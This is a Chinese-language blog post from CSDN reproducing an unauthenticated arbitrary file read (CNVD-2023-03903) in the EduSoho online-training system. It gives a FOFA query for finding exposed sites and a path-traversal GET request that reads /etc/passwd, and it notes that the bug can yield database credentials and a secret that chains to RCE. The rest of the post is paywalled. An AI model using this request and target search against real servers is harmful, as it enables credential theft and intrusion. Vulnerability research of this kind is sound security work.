EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)

已于 2023-12-15 01:26:18 修改
阅读量1.1k 收藏 10
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-15 01:10:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135007351
版权

0x01 产品简介

EduSoho教培系统是由杭州阔知网络科技有限公司研发的开源网校系统

0x02 漏洞概述

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

0x03 影响范围

 EduSoho < v22.4.7

0x04 复现环境

FOFA:

title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")

0x05 漏洞复现

PoC

GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.1
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现EduSoho-statistics-文件读取
知黑而守白
01-15 101
Edusoho 网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统Edusoho 提供在线教学、网校管理、云视频点播、直播、移 APP 等功能,为使教育机构能够以最低成本开展在线教学活动,EduSoho 也提供云服务器,云视频、云直播和移动 APP 定制服务,并配备相应的技术支持服务,让客户搭建自有品牌网校和搭积木一样简单。
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
教培系统EduSoho任意文件读取漏洞
Arched的博客
02-01 621
教培系统EduSoho任意文件读取漏洞
2024年最全教培系统EduSoho任意文件读取漏洞_edusoho历史漏洞(1),2024年最新面试总结+详细解答
最新发布
2401_84545669的博客
05-11 299
Edusoho是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。该系统存在配置文件读取漏洞,攻击者可以通过构造恶意代码,未授权直接下载或读取parameters.yml配置文件内容,里面包含了数据库账号密码以及secret值等敏感信息。
漏洞复现EduSoho教培系统 任意文件读取漏洞复现
KKleeeaa的博客
02-01 518
任意文件读取
复现Edusoho cms任意文件读取漏洞_58
fushuang333的博客
02-25 588
复现Edusoho cms任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统读取或写入任意内容。
漏洞复现-EduSoho任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-27 870
漏洞复现-EduSoho任意文件读取漏洞
漏洞复现EduSoho教培系统 任意文件读取
hackzkaq的博客
02-04 533
EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
ngnix 漏洞修复文档
03-03
ngnix 漏洞修复文档
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
神仙级黑客入门教程(非常详细),从零基础入门到精通,从看这篇开始
z099164的博客
02-25 1935
黑客怎么入门?这还不简单吗?
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration)
jyl_sh的专栏
06-08 1159
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration) Biz Framework 使用phpmig作为数据库变更脚本的引擎,并约定项目根目录下的migrations目录为默认的 migration 脚本所在目录。 基本使用 查看所有命令: php bin/phpmig 生成一个Migration脚本类: bin/phpmig generate YourClassName 参数YourClassName为本次 Migration 脚本类的类名,请根据实际...
EDUSOHO踩坑笔记之四十九:安全
jyl_sh的专栏
06-10 1107
安全 ◆ R1:禁止未过滤的变量拼接 SQL,请使用变量绑定替代。ORDER BY的字段、以及分页参数$start、$limit也需要过滤。防止 SQL 注入攻击。 注意 SQL 注入会导致数据库被拖库、数据被破坏、信息泄露等严重的安全问题,属于 Web 开发安全中,破坏性最大的安全问题。 继承自GeneralDaoImpl的 Dao,可以通过sql($sql, $orderBys=null, $start=null, $limit=null)来组装 OrderBy 以及分页参数。例: ...
记一次edusoho问题
weixin_30505485的博客
06-22 576
问题描述:Edusoho如何迁移到本地windows或另外一台Linux服务器上 解决问题步骤: 1.参考官方文档官方文档地址如下:http://www.qiqiuyu.com/my/course/331 试验过官方文档的方案,发现并不能直接解决我的问题 2.通过提问(像github对应的项目提issue)’ 这个地址关于我对问题的描述和最终解决问题:https://github.com...
漏洞复现CNVD-2023-08743
zkaqlaoniao的博客
10-30 194
title=”人力资源信息管理系统
edusrc系列(一):从springboot信息泄露到拿下管理员权限
weixin_67488888的博客
09-13 316
先简单的fuzz一下路径,得到了一些user,system,survery等一些有效的根路径,继续fuzz一下路径。当然了测试,用的是自己号。GET请求/env会直接泄露环境变量,内网地址,配置中的用户名等信息。将POC中的security.user.password替换为实际要获取的属性名,直接发包就行。大量未授权操作:如未授权添加角色,未授权查看角色列表,未授权删除角色。
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁,并严格按照厂商提供的修复建议进行操作,确保系统安全性。 对于系统管理员和安全工程师来说,他们需要关注cnvd-2023-69477的具体描述和风险评估,及时评估自身系统是否受到影响,快速制定修复计划并进行安全补丁的安装和验证。同时,建议关注该漏洞的后续动态,以便获取更多关于漏洞的详细信息和最新修复方案,及时做好安全防护工作。 总之,cnvd-2023-69477作为一个漏洞通告,提醒着用户和安全从业人员关注系统安全,及时采取措施保护系统,防范潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值